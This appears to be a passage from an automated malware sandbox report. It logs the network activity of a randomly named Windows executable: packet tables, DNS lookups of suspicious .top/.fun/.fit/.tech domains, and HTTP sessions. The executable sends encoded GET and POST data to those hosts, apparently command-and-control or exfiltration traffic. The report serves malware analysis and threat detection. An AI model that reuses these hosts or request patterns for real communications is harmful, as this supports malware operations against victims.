Dec 13, 2024 13:18:37.445528030 CET | 49788 | 80 | 192.168.2.24 | 84.32.84.32
Dec 13, 2024 13:18:37.445569038 CET | 80 | 49788 | 84.32.84.32 | 192.168.2.24
Dec 13, 2024 13:18:37.445585012 CET | 49788 | 80 | 192.168.2.24 | 84.32.84.32
Dec 13, 2024 13:18:37.445602894 CET | 80 | 49788 | 84.32.84.32 | 192.168.2.24
Dec 13, 2024 13:18:37.445610046 CET | 49788 | 80 | 192.168.2.24 | 84.32.84.32
Dec 13, 2024 13:18:37.445640087 CET | 80 | 49788 | 84.32.84.32 | 192.168.2.24
Dec 13, 2024 13:18:37.445652962 CET | 49788 | 80 | 192.168.2.24 | 84.32.84.32
Dec 13, 2024 13:18:37.445673943 CET | 80 | 49788 | 84.32.84.32 | 192.168.2.24
Dec 13, 2024 13:18:37.445775032 CET | 49788 | 80 | 192.168.2.24 | 84.32.84.32
Dec 13, 2024 13:18:37.462639093 CET | 49788 | 80 | 192.168.2.24 | 84.32.84.32
Dec 13, 2024 13:18:37.582732916 CET | 80 | 49788 | 84.32.84.32 | 192.168.2.24
Dec 13, 2024 13:18:42.983072996 CET | 49789 | 80 | 192.168.2.24 | 172.67.155.214
Dec 13, 2024 13:18:43.103749037 CET | 80 | 49789 | 172.67.155.214 | 192.168.2.24
Dec 13, 2024 13:18:43.103847027 CET | 49789 | 80 | 192.168.2.24 | 172.67.155.214
Dec 13, 2024 13:18:43.127372026 CET | 49789 | 80 | 192.168.2.24 | 172.67.155.214
Dec 13, 2024 13:18:43.247188091 CET | 80 | 49789 | 172.67.155.214 | 192.168.2.24
Dec 13, 2024 13:18:44.629293919 CET | 49789 | 80 | 192.168.2.24 | 172.67.155.214
Dec 13, 2024 13:18:44.714015961 CET | 80 | 49789 | 172.67.155.214 | 192.168.2.24
Dec 13, 2024 13:18:44.714637041 CET | 80 | 49789 | 172.67.155.214 | 192.168.2.24
Dec 13, 2024 13:18:44.714750051 CET | 49789 | 80 | 192.168.2.24 | 172.67.155.214
Dec 13, 2024 13:18:44.714778900 CET | 49789 | 80 | 192.168.2.24 | 172.67.155.214
Dec 13, 2024 13:18:44.749164104 CET | 80 | 49789 | 172.67.155.214 | 192.168.2.24
Dec 13, 2024 13:18:44.749900103 CET | 49789 | 80 | 192.168.2.24 | 172.67.155.214
Dec 13, 2024 13:18:45.656414986 CET | 49790 | 80 | 192.168.2.24 | 172.67.155.214
Dec 13, 2024 13:18:45.776310921 CET | 80 | 49790 | 172.67.155.214 | 192.168.2.24
Dec 13, 2024 13:18:45.776510000 CET | 49790 | 80 | 192.168.2.24 | 172.67.155.214
Dec 13, 2024 13:18:45.816857100 CET | 49790 | 80 | 192.168.2.24 | 172.67.155.214
Dec 13, 2024 13:18:45.936892986 CET | 80 | 49790 | 172.67.155.214 | 192.168.2.24
Dec 13, 2024 13:18:47.329255104 CET | 49790 | 80 | 192.168.2.24 | 172.67.155.214
Dec 13, 2024 13:18:47.379065037 CET | 80 | 49790 | 172.67.155.214 | 192.168.2.24
Dec 13, 2024 13:18:47.379159927 CET | 49790 | 80 | 192.168.2.24 | 172.67.155.214
Dec 13, 2024 13:18:47.379254103 CET | 80 | 49790 | 172.67.155.214 | 192.168.2.24
Dec 13, 2024 13:18:47.379306078 CET | 49790 | 80 | 192.168.2.24 | 172.67.155.214
Dec 13, 2024 13:18:47.449363947 CET | 80 | 49790 | 172.67.155.214 | 192.168.2.24
Dec 13, 2024 13:18:47.449476004 CET | 49790 | 80 | 192.168.2.24 | 172.67.155.214
Dec 13, 2024 13:18:48.341885090 CET | 49791 | 80 | 192.168.2.24 | 172.67.155.214
Dec 13, 2024 13:18:48.461997032 CET | 80 | 49791 | 172.67.155.214 | 192.168.2.24
Dec 13, 2024 13:18:48.462249994 CET | 49791 | 80 | 192.168.2.24 | 172.67.155.214
Dec 13, 2024 13:18:48.484707117 CET | 49791 | 80 | 192.168.2.24 | 172.67.155.214
Dec 13, 2024 13:18:48.604863882 CET | 80 | 49791 | 172.67.155.214 | 192.168.2.24
Dec 13, 2024 13:18:48.604912996 CET | 80 | 49791 | 172.67.155.214 | 192.168.2.24
Dec 13, 2024 13:18:48.604994059 CET | 80 | 49791 | 172.67.155.214 | 192.168.2.24
Dec 13, 2024 13:18:48.604996920 CET | 49791 | 80 | 192.168.2.24 | 172.67.155.214
Dec 13, 2024 13:18:48.605024099 CET | 80 | 49791 | 172.67.155.214 | 192.168.2.24
Dec 13, 2024 13:18:48.605051041 CET | 80 | 49791 | 172.67.155.214 | 192.168.2.24
Dec 13, 2024 13:18:48.605077028 CET | 49791 | 80 | 192.168.2.24 | 172.67.155.214
Dec 13, 2024 13:18:48.605077982 CET | 80 | 49791 | 172.67.155.214 | 192.168.2.24
Dec 13, 2024 13:18:48.605104923 CET | 80 | 49791 | 172.67.155.214 | 192.168.2.24
Dec 13, 2024 13:18:48.605110884 CET | 49791 | 80 | 192.168.2.24 | 172.67.155.214
Dec 13, 2024 13:18:48.605125904 CET | 49791 | 80 | 192.168.2.24 | 172.67.155.214
Dec 13, 2024 13:18:48.605155945 CET | 49791 | 80 | 192.168.2.24 | 172.67.155.214
Dec 13, 2024 13:18:48.605159044 CET | 80 | 49791 | 172.67.155.214 | 192.168.2.24
Dec 13, 2024 13:18:48.605186939 CET | 80 | 49791 | 172.67.155.214 | 192.168.2.24
Dec 13, 2024 13:18:48.605212927 CET | 80 | 49791 | 172.67.155.214 | 192.168.2.24
Dec 13, 2024 13:18:48.605221987 CET | 49791 | 80 | 192.168.2.24 | 172.67.155.214
Dec 13, 2024 13:18:48.605237007 CET | 49791 | 80 | 192.168.2.24 | 172.67.155.214
Dec 13, 2024 13:18:48.605261087 CET | 49791 | 80 | 192.168.2.24 | 172.67.155.214
Dec 13, 2024 13:18:48.725231886 CET | 80 | 49791 | 172.67.155.214 | 192.168.2.24
Dec 13, 2024 13:18:48.725272894 CET | 80 | 49791 | 172.67.155.214 | 192.168.2.24
Dec 13, 2024 13:18:48.725356102 CET | 49791 | 80 | 192.168.2.24 | 172.67.155.214
Dec 13, 2024 13:18:48.725385904 CET | 80 | 49791 | 172.67.155.214 | 192.168.2.24
Dec 13, 2024 13:18:48.725415945 CET | 80 | 49791 | 172.67.155.214 | 192.168.2.24
Dec 13, 2024 13:18:48.725469112 CET | 80 | 49791 | 172.67.155.214 | 192.168.2.24
Dec 13, 2024 13:18:48.725497007 CET | 80 | 49791 | 172.67.155.214 | 192.168.2.24
Dec 13, 2024 13:18:48.725547075 CET | 49791 | 80 | 192.168.2.24 | 172.67.155.214
Dec 13, 2024 13:18:48.766958952 CET | 80 | 49791 | 172.67.155.214 | 192.168.2.24
Dec 13, 2024 13:18:48.887044907 CET | 80 | 49791 | 172.67.155.214 | 192.168.2.24
Dec 13, 2024 13:18:49.997337103 CET | 49791 | 80 | 192.168.2.24 | 172.67.155.214
Dec 13, 2024 13:18:50.117885113 CET | 80 | 49791 | 172.67.155.214 | 192.168.2.24
Dec 13, 2024 13:18:50.118001938 CET | 49791 | 80 | 192.168.2.24 | 172.67.155.214
Dec 13, 2024 13:18:51.015155077 CET | 49792 | 80 | 192.168.2.24 | 172.67.155.214
Dec 13, 2024 13:18:51.134999037 CET | 80 | 49792 | 172.67.155.214 | 192.168.2.24
Dec 13, 2024 13:18:51.135248899 CET | 49792 | 80 | 192.168.2.24 | 172.67.155.214
Dec 13, 2024 13:18:51.145190001 CET | 49792 | 80 | 192.168.2.24 | 172.67.155.214
Dec 13, 2024 13:18:51.265666962 CET | 80 | 49792 | 172.67.155.214 | 192.168.2.24
Dec 13, 2024 13:18:52.731097937 CET | 80 | 49792 | 172.67.155.214 | 192.168.2.24
Dec 13, 2024 13:18:52.731813908 CET | 80 | 49792 | 172.67.155.214 | 192.168.2.24
Dec 13, 2024 13:18:52.731892109 CET | 49792 | 80 | 192.168.2.24 | 172.67.155.214
Dec 13, 2024 13:18:52.736078024 CET | 49792 | 80 | 192.168.2.24 | 172.67.155.214
Dec 13, 2024 13:18:52.856043100 CET | 80 | 49792 | 172.67.155.214 | 192.168.2.24
Dec 13, 2024 13:18:58.858266115 CET | 49793 | 80 | 192.168.2.24 | 199.59.243.227
Dec 13, 2024 13:18:58.978131056 CET | 80 | 49793 | 199.59.243.227 | 192.168.2.24
Dec 13, 2024 13:18:58.978265047 CET | 49793 | 80 | 192.168.2.24 | 199.59.243.227
Dec 13, 2024 13:18:58.996330023 CET | 49793 | 80 | 192.168.2.24 | 199.59.243.227
Dec 13, 2024 13:18:59.116588116 CET | 80 | 49793 | 199.59.243.227 | 192.168.2.24
Dec 13, 2024 13:19:00.074666977 CET | 80 | 49793 | 199.59.243.227 | 192.168.2.24
Dec 13, 2024 13:19:00.074754000 CET | 80 | 49793 | 199.59.243.227 | 192.168.2.24
Dec 13, 2024 13:19:00.074773073 CET | 80 | 49793 | 199.59.243.227 | 192.168.2.24
Dec 13, 2024 13:19:00.074872017 CET | 49793 | 80 | 192.168.2.24 | 199.59.243.227
Dec 13, 2024 13:19:00.076297998 CET | 49793 | 80 | 192.168.2.24 | 199.59.243.227
Dec 13, 2024 13:19:00.511780024 CET | 49793 | 80 | 192.168.2.24 | 199.59.243.227
Dec 13, 2024 13:19:01.521393061 CET | 49794 | 80 | 192.168.2.24 | 199.59.243.227
Dec 13, 2024 13:19:01.641305923 CET | 80 | 49794 | 199.59.243.227 | 192.168.2.24
Dec 13, 2024 13:19:01.641459942 CET | 49794 | 80 | 192.168.2.24 | 199.59.243.227
Dec 13, 2024 13:19:01.662595987 CET | 49794 | 80 | 192.168.2.24 | 199.59.243.227
Dec 13, 2024 13:19:01.783415079 CET | 80 | 49794 | 199.59.243.227 | 192.168.2.24
Dec 13, 2024 13:19:02.747889042 CET | 80 | 49794 | 199.59.243.227 | 192.168.2.24
Dec 13, 2024 13:19:02.747917891 CET | 80 | 49794 | 199.59.243.227 | 192.168.2.24
Dec 13, 2024 13:19:02.747939110 CET | 80 | 49794 | 199.59.243.227 | 192.168.2.24
Dec 13, 2024 13:19:02.748121977 CET | 49794 | 80 | 192.168.2.24 | 199.59.243.227
Dec 13, 2024 13:19:02.748121977 CET | 49794 | 80 | 192.168.2.24 | 199.59.243.227
Dec 13, 2024 13:19:03.186918020 CET | 49794 | 80 | 192.168.2.24 | 199.59.243.227
Dec 13, 2024 13:19:04.216978073 CET | 49795 | 80 | 192.168.2.24 | 199.59.243.227
Dec 13, 2024 13:19:04.338141918 CET | 80 | 49795 | 199.59.243.227 | 192.168.2.24
Dec 13, 2024 13:19:04.338263035 CET | 49795 | 80 | 192.168.2.24 | 199.59.243.227
Dec 13, 2024 13:19:04.356589079 CET | 49795 | 80 | 192.168.2.24 | 199.59.243.227
Dec 13, 2024 13:19:04.476762056 CET | 80 | 49795 | 199.59.243.227 | 192.168.2.24
Dec 13, 2024 13:19:04.476785898 CET | 80 | 49795 | 199.59.243.227 | 192.168.2.24
Dec 13, 2024 13:19:04.476799965 CET | 80 | 49795 | 199.59.243.227 | 192.168.2.24
Dec 13, 2024 13:19:04.476813078 CET | 80 | 49795 | 199.59.243.227 | 192.168.2.24
Dec 13, 2024 13:19:04.476843119 CET | 80 | 49795 | 199.59.243.227 | 192.168.2.24
Dec 13, 2024 13:19:04.476855993 CET | 80 | 49795 | 199.59.243.227 | 192.168.2.24
Dec 13, 2024 13:19:04.476870060 CET | 80 | 49795 | 199.59.243.227 | 192.168.2.24
Dec 13, 2024 13:19:04.476896048 CET | 80 | 49795 | 199.59.243.227 | 192.168.2.24
Dec 13, 2024 13:19:04.476907969 CET | 80 | 49795 | 199.59.243.227 | 192.168.2.24
Dec 13, 2024 13:19:04.476937056 CET | 49795 | 80 | 192.168.2.24 | 199.59.243.227
Dec 13, 2024 13:19:04.477005959 CET | 49795 | 80 | 192.168.2.24 | 199.59.243.227
Dec 13, 2024 13:19:04.596522093 CET | 80 | 49795 | 199.59.243.227 | 192.168.2.24
Dec 13, 2024 13:19:04.596688032 CET | 49795 | 80 | 192.168.2.24 | 199.59.243.227
Dec 13, 2024 13:19:04.596976042 CET | 80 | 49795 | 199.59.243.227 | 192.168.2.24
Dec 13, 2024 13:19:04.597007036 CET | 80 | 49795 | 199.59.243.227 | 192.168.2.24
Dec 13, 2024 13:19:04.597042084 CET | 80 | 49795 | 199.59.243.227 | 192.168.2.24
Dec 13, 2024 13:19:04.597042084 CET | 49795 | 80 | 192.168.2.24 | 199.59.243.227
Dec 13, 2024 13:19:04.597057104 CET | 49795 | 80 | 192.168.2.24 | 199.59.243.227
Dec 13, 2024 13:19:04.597084999 CET | 49795 | 80 | 192.168.2.24 | 199.59.243.227
Dec 13, 2024 13:19:04.597115040 CET | 80 | 49795 | 199.59.243.227 | 192.168.2.24
Dec 13, 2024 13:19:04.597167969 CET | 49795 | 80 | 192.168.2.24 | 199.59.243.227
Dec 13, 2024 13:19:04.597245932 CET | 80 | 49795 | 199.59.243.227 | 192.168.2.24
Dec 13, 2024 13:19:04.597276926 CET | 80 | 49795 | 199.59.243.227 | 192.168.2.24
Dec 13, 2024 13:19:04.639204025 CET | 80 | 49795 | 199.59.243.227 | 192.168.2.24
                                                      Dec 13, 2024 13:19:04.759457111 CET8049795199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:05.742974997 CET8049795199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:05.743029118 CET8049795199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:05.743072033 CET8049795199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:05.743145943 CET4979580192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:05.743195057 CET4979580192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:05.875988960 CET4979580192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:06.925023079 CET4979680192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:07.045919895 CET8049796199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:07.046058893 CET4979680192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:07.058255911 CET4979680192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:07.178236008 CET8049796199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:08.143765926 CET8049796199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:08.143809080 CET8049796199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:08.143826962 CET8049796199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:08.144035101 CET4979680192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:08.147918940 CET4979680192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:08.267827034 CET8049796199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:13.883632898 CET4979780192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:14.003627062 CET8049797199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:14.003721952 CET4979780192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:14.020610094 CET4979780192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:14.140683889 CET8049797199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:15.100106955 CET8049797199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:15.100208044 CET8049797199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:15.100220919 CET8049797199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:15.104233980 CET4979780192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:15.530750036 CET4979780192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:16.549424887 CET4979980192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:16.669254065 CET8049799199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:16.669336081 CET4979980192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:16.684420109 CET4979980192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:16.804214001 CET8049799199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:17.765785933 CET8049799199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:17.765820026 CET8049799199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:17.765862942 CET8049799199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:17.766303062 CET4979980192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:18.325392962 CET4979980192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:19.350744963 CET4980180192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:19.470844984 CET8049801199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:19.475116014 CET4980180192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:19.491897106 CET4980180192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:19.611835003 CET8049801199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:19.611903906 CET8049801199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:19.611913919 CET8049801199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:19.611952066 CET4980180192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:19.611991882 CET8049801199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:19.612026930 CET4980180192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:19.612030983 CET8049801199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:19.612148046 CET8049801199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:19.612158060 CET8049801199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:19.612180948 CET4980180192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:19.612238884 CET4980180192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:19.612248898 CET8049801199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:19.612267017 CET8049801199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:19.612319946 CET8049801199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:19.612441063 CET4980180192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:19.731861115 CET8049801199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:19.731885910 CET8049801199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:19.731955051 CET8049801199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:19.731969118 CET8049801199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:19.731981039 CET8049801199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:19.732002974 CET8049801199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:19.732019901 CET4980180192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:19.732157946 CET4980180192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:19.774883986 CET8049801199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:19.898953915 CET8049801199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:20.875353098 CET8049801199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:20.875376940 CET8049801199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:20.875432968 CET8049801199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:20.875518084 CET4980180192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:20.875576973 CET4980180192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:21.583723068 CET4980180192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:22.591777086 CET4980380192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:22.711689949 CET8049803199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:22.715290070 CET4980380192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:22.728226900 CET4980380192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:22.848022938 CET8049803199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:23.813772917 CET8049803199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:23.813800097 CET8049803199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:23.813930988 CET4980380192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:23.814110041 CET8049803199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:23.814157009 CET4980380192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:23.817579031 CET4980380192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:23.937331915 CET8049803199.59.243.227192.168.2.24
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Dec 13, 2024 13:17:13.335721970 CET6235253192.168.2.241.1.1.1
                                                      Dec 13, 2024 13:18:09.822336912 CET6197253192.168.2.241.1.1.1
                                                      Dec 13, 2024 13:18:10.818830967 CET6197253192.168.2.241.1.1.1
                                                      Dec 13, 2024 13:18:10.846395016 CET53619721.1.1.1192.168.2.24
                                                      Dec 13, 2024 13:18:10.957381010 CET53619721.1.1.1192.168.2.24
                                                      Dec 13, 2024 13:18:27.604931116 CET5827353192.168.2.241.1.1.1
                                                      Dec 13, 2024 13:18:28.116338968 CET53582731.1.1.1192.168.2.24
                                                      Dec 13, 2024 13:18:42.488060951 CET5307553192.168.2.241.1.1.1
                                                      Dec 13, 2024 13:18:42.980770111 CET53530751.1.1.1192.168.2.24
                                                      Dec 13, 2024 13:18:58.116925001 CET5827353192.168.2.241.1.1.1
                                                      Dec 13, 2024 13:18:58.855814934 CET53582731.1.1.1192.168.2.24
                                                      Dec 13, 2024 13:19:13.174992085 CET5307553192.168.2.241.1.1.1
                                                      Dec 13, 2024 13:19:13.880259037 CET53530751.1.1.1192.168.2.24
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
--- | --- | --- | --- | --- | --- | --- | --- | ---
Dec 13, 2024 13:17:13.335721970 CET | 192.168.2.24 | 1.1.1.1 | 0x17d | Standard query (0) | srtb.msn.com | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:18:09.822336912 CET | 192.168.2.24 | 1.1.1.1 | 0xe1d9 | Standard query (0) | www.y6h6kn.top | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:18:10.818830967 CET | 192.168.2.24 | 1.1.1.1 | 0xe1d9 | Standard query (0) | www.y6h6kn.top | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:18:27.604931116 CET | 192.168.2.24 | 1.1.1.1 | 0xa9a1 | Standard query (0) | www.thesnusgang.fun | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:18:42.488060951 CET | 192.168.2.24 | 1.1.1.1 | 0x3c4d | Standard query (0) | www.telepzow.fit | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:18:58.116925001 CET | 192.168.2.24 | 1.1.1.1 | 0x95ef | Standard query (0) | www.dnft.immo | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:19:13.174992085 CET | 192.168.2.24 | 1.1.1.1 | 0x6f28 | Standard query (0) | www.deadshoy.tech | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
--- | --- | --- | --- | --- | --- | --- | --- | --- | --- | ---
Dec 13, 2024 13:17:13.473829985 CET | 1.1.1.1 | 192.168.2.24 | 0x17d | No error (0) | srtb.msn.com | www.msn.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 13, 2024 13:17:13.473829985 CET | 1.1.1.1 | 192.168.2.24 | 0x17d | No error (0) | www.msn.com | www-msn-com.a-0003.a-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 13, 2024 13:18:10.846395016 CET | 1.1.1.1 | 192.168.2.24 | 0xe1d9 | No error (0) | www.y6h6kn.top | | 103.23.149.28 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:18:10.846395016 CET | 1.1.1.1 | 192.168.2.24 | 0xe1d9 | No error (0) | www.y6h6kn.top | | 162.251.95.62 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:18:10.957381010 CET | 1.1.1.1 | 192.168.2.24 | 0xe1d9 | No error (0) | www.y6h6kn.top | | 103.23.149.28 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:18:10.957381010 CET | 1.1.1.1 | 192.168.2.24 | 0xe1d9 | No error (0) | www.y6h6kn.top | | 162.251.95.62 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:18:28.116338968 CET | 1.1.1.1 | 192.168.2.24 | 0xa9a1 | No error (0) | www.thesnusgang.fun | thesnusgang.fun | | CNAME (Canonical name) | IN (0x0001) | false
Dec 13, 2024 13:18:28.116338968 CET | 1.1.1.1 | 192.168.2.24 | 0xa9a1 | No error (0) | thesnusgang.fun | | 84.32.84.32 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:18:42.980770111 CET | 1.1.1.1 | 192.168.2.24 | 0x3c4d | No error (0) | www.telepzow.fit | | 172.67.155.214 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:18:42.980770111 CET | 1.1.1.1 | 192.168.2.24 | 0x3c4d | No error (0) | www.telepzow.fit | | 104.21.64.208 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:18:58.855814934 CET | 1.1.1.1 | 192.168.2.24 | 0x95ef | No error (0) | www.dnft.immo | 94950.bodis.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 13, 2024 13:18:58.855814934 CET | 1.1.1.1 | 192.168.2.24 | 0x95ef | No error (0) | 94950.bodis.com | | 199.59.243.227 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:19:13.880259037 CET | 1.1.1.1 | 192.168.2.24 | 0x6f28 | No error (0) | www.deadshoy.tech | | 199.59.243.227 | A (IP address) | IN (0x0001) | false
• www.y6h6kn.top
• www.thesnusgang.fun
• www.telepzow.fit
• www.dnft.immo
• www.deadshoy.tech
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
--- | --- | --- | --- | --- | --- | ---
0 | 192.168.2.24 | 49777 | 103.23.149.28 | 80 | 6880 | C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe

Timestamp | Bytes transferred | Direction | Data
--- | --- | --- | ---
Dec 13, 2024 13:18:10.985869884 CET | 438 | OUT | GET /jv64/?BTV4RR_=0rgj4Y9sgnjazUN/4YnNawpmVeS/0BjNZTVEPCZk5UU8x8xERo30l5aFjW3xVEpqAaMpb+WWzoUct0TX0HY7w9E5vaK255EpQhtC5dNFByAd90Z0uMBeXk0=&Tr=F0udvf HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Connection: close
Host: www.y6h6kn.top
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
Dec 13, 2024 13:18:12.562987089 CET | 312 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 13 Dec 2024 12:18:12 GMT
Content-Type: text/html
Content-Length: 148
Connection: close
ETag: "674427dd-94"
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
--- | --- | --- | --- | --- | --- | ---
1 | 192.168.2.24 | 49781 | 84.32.84.32 | 80 | 6880 | C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe

Timestamp | Bytes transferred | Direction | Data
--- | --- | --- | ---
Dec 13, 2024 13:18:28.271305084 CET | 719 | OUT | POST /z4qr/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: no-cache
Host: www.thesnusgang.fun
Origin: http://www.thesnusgang.fun
Referer: http://www.thesnusgang.fun/z4qr/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
Data Ascii: BTV4RR_=4bxAs9WIczJnjexwGp0veWmP2CB7tFWwaijD73KLaEH/5AWvoSyzaa8zv7WbOiHtIp0Btk0S9vpLpoqk0tgZvSWKdZv3uQIr68T2a1aQXdF7FlLS3Ec+tkx7wNgB7kOIUDw4wMggp/HN0+u1qH1YuDp+v8wewVWBYEbH5TdbftoiHg34oDjb/dg5cjrPfj8SZA==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
--- | --- | --- | --- | --- | --- | ---
2 | 192.168.2.24 | 49785 | 84.32.84.32 | 80 | 6880 | C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe

Timestamp | Bytes transferred | Direction | Data
--- | --- | --- | ---
Dec 13, 2024 13:18:30.945507050 CET | 1091 | OUT | POST /z4qr/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Content-Length: 576
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: no-cache
Host: www.thesnusgang.fun
Origin: http://www.thesnusgang.fun
Referer: http://www.thesnusgang.fun/z4qr/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
